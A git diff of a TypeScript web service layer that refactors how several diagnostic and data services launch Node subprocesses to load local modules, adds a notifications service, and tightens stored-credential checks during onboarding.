-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { CapturesData, CaptureResolveRequest, CaptureResolveResult } from "../../web/lib/knowledge-captures-types.ts"
 
 const CAPTURES_MAX_BUFFER = 2 * 1024 * 1024
 const CAPTURES_MODULE_ENV = "GSD_CAPTURES_MODULE"
 
-function resolveCapturesModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "captures.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -28,13 +24,17 @@ export async function collectCapturesData(projectCwdOverride?: string): Promise<
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const capturesModulePath = resolveCapturesModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/captures.ts")
+  const capturesModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(capturesModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(capturesModulePath))) {
     throw new Error(
       `captures data provider not found; checked=${resolveTsLoader},${capturesModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(capturesModulePath)) {
+    throw new Error(`captures data provider not found; checked=${capturesModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -46,14 +46,13 @@ export async function collectCapturesData(projectCwdOverride?: string): Promise<
     'process.stdout.write(JSON.stringify(result));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<CapturesData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -65,6 +64,7 @@ export async function collectCapturesData(projectCwdOverride?: string): Promise<
           GSD_CAPTURES_BASE: projectCwd,
         },
         maxBuffer: CAPTURES_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -95,13 +95,17 @@ export async function resolveCaptureAction(request: CaptureResolveRequest, proje
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const capturesModulePath = resolveCapturesModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/captures.ts")
+  const capturesModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(capturesModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(capturesModulePath))) {
     throw new Error(
       `captures data provider not found; checked=${resolveTsLoader},${capturesModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(capturesModulePath)) {
+    throw new Error(`captures data provider not found; checked=${capturesModulePath}`)
+  }
 
   const safeId = JSON.stringify(request.captureId)
   const safeClassification = JSON.stringify(request.classification)
@@ -115,14 +119,13 @@ export async function resolveCaptureAction(request: CaptureResolveRequest, proje
     `process.stdout.write(JSON.stringify({ ok: true, captureId: ${safeId} }));`,
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<CaptureResolveResult>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -134,6 +137,7 @@ export async function resolveCaptureAction(request: CaptureResolveRequest, proje
           GSD_CAPTURES_BASE: projectCwd,
         },
         maxBuffer: CAPTURES_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/cleanup-service.ts b/src/web/cleanup-service.ts
index a83ba40f3..2ef778a4e 100644
--- a/src/web/cleanup-service.ts
+++ b/src/web/cleanup-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { CleanupData, CleanupResult } from "../../web/lib/remaining-command-types.ts"
 
 const CLEANUP_MAX_BUFFER = 2 * 1024 * 1024
 const CLEANUP_MODULE_ENV = "GSD_CLEANUP_MODULE"
 
-function resolveCleanupModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "native-git-bridge.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -28,13 +24,17 @@ export async function collectCleanupData(projectCwdOverride?: string): Promise<C
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const cleanupModulePath = resolveCleanupModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/native-git-bridge.ts")
+  const cleanupModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(cleanupModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(cleanupModulePath))) {
     throw new Error(
       `cleanup data provider not found; checked=${resolveTsLoader},${cleanupModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(cleanupModulePath)) {
+    throw new Error(`cleanup data provider not found; checked=${cleanupModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -60,14 +60,13 @@ export async function collectCleanupData(projectCwdOverride?: string): Promise<C
     'process.stdout.write(JSON.stringify({ branches: branchList, snapshots: snapshotList }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<CleanupData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -79,6 +78,7 @@ export async function collectCleanupData(projectCwdOverride?: string): Promise<C
           GSD_CLEANUP_BASE: projectCwd,
         },
         maxBuffer: CLEANUP_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -114,13 +114,17 @@ export async function executeCleanup(
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const cleanupModulePath = resolveCleanupModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/native-git-bridge.ts")
+  const cleanupModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(cleanupModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(cleanupModulePath))) {
     throw new Error(
       `cleanup service modules not found; checked=${resolveTsLoader},${cleanupModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(cleanupModulePath)) {
+    throw new Error(`cleanup service modules not found; checked=${cleanupModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -147,14 +151,13 @@ export async function executeCleanup(
     'process.stdout.write(JSON.stringify({ deletedBranches, prunedSnapshots, message }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<CleanupResult>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -168,6 +171,7 @@ export async function executeCleanup(
           GSD_CLEANUP_SNAPSHOTS: JSON.stringify(pruneSnapshots),
         },
         maxBuffer: CLEANUP_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/doctor-service.ts b/src/web/doctor-service.ts
index 755f155b3..ec5bc4dac 100644
--- a/src/web/doctor-service.ts
+++ b/src/web/doctor-service.ts
@@ -4,47 +4,31 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { DoctorReport, DoctorFixResult } from "../../web/lib/diagnostics-types.ts"
 
 const DOCTOR_MAX_BUFFER = 2 * 1024 * 1024
 const DOCTOR_MODULE_ENV = "GSD_DOCTOR_MODULE"
 
-function resolveDoctorModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "doctor.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
 
-function validateModulePaths(
-  resolveTsLoader: string,
-  doctorModulePath: string,
-): void {
-  if (!existsSync(resolveTsLoader) || !existsSync(doctorModulePath)) {
-    throw new Error(
-      `doctor data provider not found; checked=${resolveTsLoader},${doctorModulePath}`,
-    )
-  }
-}
-
 function runDoctorChild(
   packageRoot: string,
   projectCwd: string,
   script: string,
   resolveTsLoader: string,
   doctorModulePath: string,
+  moduleResolution: { modulePath: string; useCompiledJs: boolean },
   scope?: string,
 ): Promise<string> {
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
   return new Promise<string>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -57,6 +41,7 @@ function runDoctorChild(
           GSD_DOCTOR_SCOPE: scope ?? "",
         },
         maxBuffer: DOCTOR_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -78,8 +63,17 @@ export async function collectDoctorData(scope?: string, projectCwdOverride?: str
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const doctorModulePath = resolveDoctorModulePath(packageRoot)
-  validateModulePaths(resolveTsLoader, doctorModulePath)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/doctor.ts")
+  const doctorModulePath = moduleResolution.modulePath
+
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(doctorModulePath))) {
+    throw new Error(
+      `doctor data provider not found; checked=${resolveTsLoader},${doctorModulePath}`,
+    )
+  }
+  if (moduleResolution.useCompiledJs && !existsSync(doctorModulePath)) {
+    throw new Error(`doctor data provider not found; checked=${doctorModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -98,7 +92,7 @@ export async function collectDoctorData(scope?: string, projectCwdOverride?: str
   ].join(" ")
 
   const stdout = await runDoctorChild(
-    packageRoot, projectCwd, script, resolveTsLoader, doctorModulePath, scope,
+    packageRoot, projectCwd, script, resolveTsLoader, doctorModulePath, moduleResolution, scope,
   )
 
   try {
@@ -119,8 +113,17 @@ export async function applyDoctorFixes(scope?: string, projectCwdOverride?: stri
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const doctorModulePath = resolveDoctorModulePath(packageRoot)
-  validateModulePaths(resolveTsLoader, doctorModulePath)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/doctor.ts")
+  const doctorModulePath = moduleResolution.modulePath
+
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(doctorModulePath))) {
+    throw new Error(
+      `doctor data provider not found; checked=${resolveTsLoader},${doctorModulePath}`,
+    )
+  }
+  if (moduleResolution.useCompiledJs && !existsSync(doctorModulePath)) {
+    throw new Error(`doctor data provider not found; checked=${doctorModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -136,7 +139,7 @@ export async function applyDoctorFixes(scope?: string, projectCwdOverride?: stri
   ].join(" ")
 
   const stdout = await runDoctorChild(
-    packageRoot, projectCwd, script, resolveTsLoader, doctorModulePath, scope,
+    packageRoot, projectCwd, script, resolveTsLoader, doctorModulePath, moduleResolution, scope,
   )
 
   try {
diff --git a/src/web/export-service.ts b/src/web/export-service.ts
index 46794d972..002c98a94 100644
--- a/src/web/export-service.ts
+++ b/src/web/export-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { ExportResult } from "../../web/lib/remaining-command-types.ts"
 
 const EXPORT_MAX_BUFFER = 4 * 1024 * 1024
 const EXPORT_MODULE_ENV = "GSD_EXPORT_MODULE"
 
-function resolveExportModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "export.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -31,13 +27,17 @@ export async function collectExportData(
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const exportModulePath = resolveExportModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/export.ts")
+  const exportModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(exportModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(exportModulePath))) {
     throw new Error(
       `export data provider not found; checked=${resolveTsLoader},${exportModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(exportModulePath)) {
+    throw new Error(`export data provider not found; checked=${exportModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -55,14 +55,13 @@ export async function collectExportData(
     '}',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<ExportResult>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -75,6 +74,7 @@ export async function collectExportData(
           GSD_EXPORT_FORMAT: format,
         },
         maxBuffer: EXPORT_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/forensics-service.ts b/src/web/forensics-service.ts
index 80867429e..ac74855d6 100644
--- a/src/web/forensics-service.ts
+++ b/src/web/forensics-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { ForensicReport } from "../../web/lib/diagnostics-types.ts"
 
 const FORENSICS_MAX_BUFFER = 2 * 1024 * 1024
 const FORENSICS_MODULE_ENV = "GSD_FORENSICS_MODULE"
 
-function resolveForensicsModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "forensics.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -30,13 +26,17 @@ export async function collectForensicsData(projectCwdOverride?: string): Promise
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const forensicsModulePath = resolveForensicsModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/forensics.ts")
+  const forensicsModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(forensicsModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(forensicsModulePath))) {
     throw new Error(
       `forensics data provider not found; checked=${resolveTsLoader},${forensicsModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(forensicsModulePath)) {
+    throw new Error(`forensics data provider not found; checked=${forensicsModulePath}`)
+  }
 
   // The child script loads the upstream module, calls buildForensicReport(),
   // simplifies the output for browser consumption, and writes JSON to stdout.
@@ -70,18 +70,19 @@ export async function collectForensicsData(projectCwdOverride?: string): Promise
     '  unitTraces,',
     '  completedKeyCount: (report.completedKeys || []).length,',
     '  metrics,',
+    '  journalSummary: report.journalSummary || null,',
+    '  activityLogMeta: report.activityLogMeta || null,',
     '};',
     'process.stdout.write(JSON.stringify(result));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<ForensicReport>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -93,6 +94,7 @@ export async function collectForensicsData(projectCwdOverride?: string): Promise
           GSD_FORENSICS_BASE: projectCwd,
         },
         maxBuffer: FORENSICS_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/history-service.ts b/src/web/history-service.ts
index c2d2a8685..ac1808aa2 100644
--- a/src/web/history-service.ts
+++ b/src/web/history-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { HistoryData } from "../../web/lib/remaining-command-types.ts"
 
 const HISTORY_MAX_BUFFER = 2 * 1024 * 1024
 const HISTORY_MODULE_ENV = "GSD_HISTORY_MODULE"
 
-function resolveHistoryModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "metrics.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -28,13 +24,17 @@ export async function collectHistoryData(projectCwdOverride?: string): Promise<H
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const historyModulePath = resolveHistoryModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/metrics.ts")
+  const historyModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(historyModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(historyModulePath))) {
     throw new Error(
       `history data provider not found; checked=${resolveTsLoader},${historyModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(historyModulePath)) {
+    throw new Error(`history data provider not found; checked=${historyModulePath}`)
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -48,14 +48,13 @@ export async function collectHistoryData(projectCwdOverride?: string): Promise<H
     'process.stdout.write(JSON.stringify({ units, totals, byPhase, bySlice, byModel }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<HistoryData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -67,6 +66,7 @@ export async function collectHistoryData(projectCwdOverride?: string): Promise<H
           GSD_HISTORY_BASE: projectCwd,
         },
         maxBuffer: HISTORY_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/hooks-service.ts b/src/web/hooks-service.ts
index bdaaea267..5eebcf4d9 100644
--- a/src/web/hooks-service.ts
+++ b/src/web/hooks-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
 import type { HooksData } from "../../web/lib/remaining-command-types.ts"
 
 const HOOKS_MAX_BUFFER = 512 * 1024
 const HOOKS_MODULE_ENV = "GSD_HOOKS_MODULE"
 
-function resolveHooksModulePath(packageRoot: string): string {
-  return join(packageRoot, "src", "resources", "extensions", "gsd", "post-unit-hooks.ts")
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
 }
@@ -29,16 +25,20 @@ export async function collectHooksData(projectCwdOverride?: string): Promise<Hoo
   const { packageRoot, projectCwd } = config
 
   const resolveTsLoader = resolveTsLoaderPath(packageRoot)
-  const hooksModulePath = resolveHooksModulePath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/post-unit-hooks.ts")
+  const hooksModulePath = moduleResolution.modulePath
 
-  if (!existsSync(resolveTsLoader) || !existsSync(hooksModulePath)) {
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(hooksModulePath))) {
     throw new Error(
       `hooks data provider not found; checked=${resolveTsLoader},${hooksModulePath}`,
     )
   }
+  if (moduleResolution.useCompiledJs && !existsSync(hooksModulePath)) {
+    throw new Error(`hooks data provider not found; checked=${hooksModulePath}`)
+  }
 
   // getHookStatus() internally calls resolvePostUnitHooks() and resolvePreDispatchHooks()
-  // from preferences.ts, which read from process.cwd()/.gsd/preferences.md.
+  // from preferences.ts, which read from process.cwd()/.gsd/PREFERENCES.md.
   // We set cwd to projectCwd so preferences resolution finds the right files.
   // In a cold child process, cycleCounts is empty, so activeCycles will be {}.
   const script = [
@@ -49,14 +49,13 @@ export async function collectHooksData(projectCwdOverride?: string): Promise<Hoo
     'process.stdout.write(JSON.stringify({ entries, formattedStatus }));',
   ].join(" ")
 
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
   return await new Promise<HooksData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -67,6 +66,7 @@ export async function collectHooksData(projectCwdOverride?: string): Promise<Hoo
           [HOOKS_MODULE_ENV]: hooksModulePath,
         },
         maxBuffer: HOOKS_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/web/notifications-service.ts b/src/web/notifications-service.ts
new file mode 100644
index 000000000..5253d8a77
--- /dev/null
+++ b/src/web/notifications-service.ts
@@ -0,0 +1,143 @@
+// GSD Web — Notifications Service
+// Loads notification data via a child process that imports the notification store.
+
+import { execFile } from "node:child_process"
+import { existsSync } from "node:fs"
+import { join } from "node:path"
+import { pathToFileURL } from "node:url"
+
+import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts"
+
+export interface NotificationsData {
+  entries: Array<{
+    id: string
+    ts: string
+    severity: string
+    message: string
+    source: string
+    read: boolean
+  }>
+  unreadCount: number
+  totalCount: number
+}
+
+const NOTIFICATIONS_MAX_BUFFER = 2 * 1024 * 1024
+const NOTIFICATIONS_MODULE_ENV = "GSD_NOTIFICATIONS_MODULE"
+
+function resolveTsLoaderPath(packageRoot: string): string {
+  return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs")
+}
+
+export async function collectNotificationsData(projectCwdOverride?: string): Promise<NotificationsData> {
+  const config = resolveBridgeRuntimeConfig(undefined, projectCwdOverride)
+  const { packageRoot, projectCwd } = config
+
+  const resolveTsLoader = resolveTsLoaderPath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/notification-store.ts")
+  const modulePath = moduleResolution.modulePath
+
+  if (!moduleResolution.useCompiledJs && (!existsSync(resolveTsLoader) || !existsSync(modulePath))) {
+    throw new Error(
+      `notifications data provider not found; checked=${resolveTsLoader},${modulePath}`,
+    )
+  }
+  if (moduleResolution.useCompiledJs && !existsSync(modulePath)) {
+    throw new Error(`notifications data provider not found; checked=${modulePath}`)
+  }
+
+  const script = [
+    'const { pathToFileURL } = await import("node:url");',
+    `const mod = await import(pathToFileURL(process.env.${NOTIFICATIONS_MODULE_ENV}).href);`,
+    'const basePath = process.env.GSD_NOTIFICATIONS_BASE;',
+    'const entries = mod.readNotifications(basePath);',
+    'const unread = entries.filter(e => !e.read).length;',
+    'const result = { entries, unreadCount: unread, totalCount: entries.length };',
+    'process.stdout.write(JSON.stringify(result));',
+  ].join(" ")
+
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
+  return await new Promise<NotificationsData>((resolveResult, reject) => {
+    execFile(
+      process.execPath,
+      [
+        ...prefixArgs,
+        "--eval",
+        script,
+      ],
+      {
+        cwd: packageRoot,
+        env: {
+          ...process.env,
+          [NOTIFICATIONS_MODULE_ENV]: modulePath,
+          GSD_NOTIFICATIONS_BASE: projectCwd,
+        },
+        maxBuffer: NOTIFICATIONS_MAX_BUFFER,
+        timeout: 10_000,
+      },
+      (err, stdout, stderr) => {
+        if (err) {
+          reject(new Error(`notifications subprocess failed: ${err.message}${stderr ? `\nstderr: ${stderr}` : ""}`))
+          return
+        }
+        try {
+          const parsed = JSON.parse(stdout) as NotificationsData
+          resolveResult(parsed)
+        } catch (parseErr) {
+          reject(new Error(`Failed to parse notifications output: ${(parseErr as Error).message}`))
+        }
+      },
+    )
+  })
+}
+
+export async function clearNotificationsData(projectCwdOverride?: string): Promise<void> {
+  const config = resolveBridgeRuntimeConfig(undefined, projectCwdOverride)
+  const { packageRoot, projectCwd } = config
+
+  const resolveTsLoader = resolveTsLoaderPath(packageRoot)
+  const moduleResolution = resolveSubprocessModule(packageRoot, "resources/extensions/gsd/notification-store.ts")
+  const modulePath = moduleResolution.modulePath
+
+  if (moduleResolution.useCompiledJs && !existsSync(modulePath)) {
+    throw new Error(`notifications data provider not found; checked=${modulePath}`)
+  }
+
+  const script = [
+    'const { pathToFileURL } = await import("node:url");',
+    `const mod = await import(pathToFileURL(process.env.${NOTIFICATIONS_MODULE_ENV}).href);`,
+    'mod.clearNotifications(process.env.GSD_NOTIFICATIONS_BASE);',
+    'process.stdout.write("ok");',
+  ].join(" ")
+
+  const prefixArgs = buildSubprocessPrefixArgs(packageRoot, moduleResolution, pathToFileURL(resolveTsLoader).href)
+
+  return await new Promise<void>((resolveResult, reject) => {
+    execFile(
+      process.execPath,
+      [
+        ...prefixArgs,
+        "--eval",
+        script,
+      ],
+      {
+        cwd: packageRoot,
+        env: {
+          ...process.env,
+          [NOTIFICATIONS_MODULE_ENV]: modulePath,
+          GSD_NOTIFICATIONS_BASE: projectCwd,
+        },
+        maxBuffer: NOTIFICATIONS_MAX_BUFFER,
+        timeout: 10_000,
+      },
+      (err, _stdout, stderr) => {
+        if (err) {
+          reject(new Error(`clear notifications subprocess failed: ${err.message}${stderr ? `\nstderr: ${stderr}` : ""}`))
+          return
+        }
+        resolveResult()
+      },
+    )
+  })
+}
diff --git a/src/web/onboarding-service.ts b/src/web/onboarding-service.ts
index 9c5c6af34..259865da5 100644
--- a/src/web/onboarding-service.ts
+++ b/src/web/onboarding-service.ts
@@ -231,7 +231,9 @@ function resolveOnboardingLockReason(
 
 function hasStoredCredentialValue(authStorage: AuthStorageInstance, providerId: string): boolean {
   return authStorage.getCredentialsForProvider(providerId).some((credential) => {
-    if (credential.type === "oauth") return true;
+    if (credential.type === "oauth") {
+      return typeof credential.access === "string" && credential.access.trim().length > 0;
+    }
     return typeof credential.key === "string" && credential.key.trim().length > 0;
   });
 }
@@ -247,9 +249,6 @@ function resolveCredentialSource(
   if (getEnvApiKeyFn(providerId)) {
     return "environment";
   }
-  if (authStorage.hasAuth(providerId)) {
-    return "runtime";
-  }
   return null;
 }
 
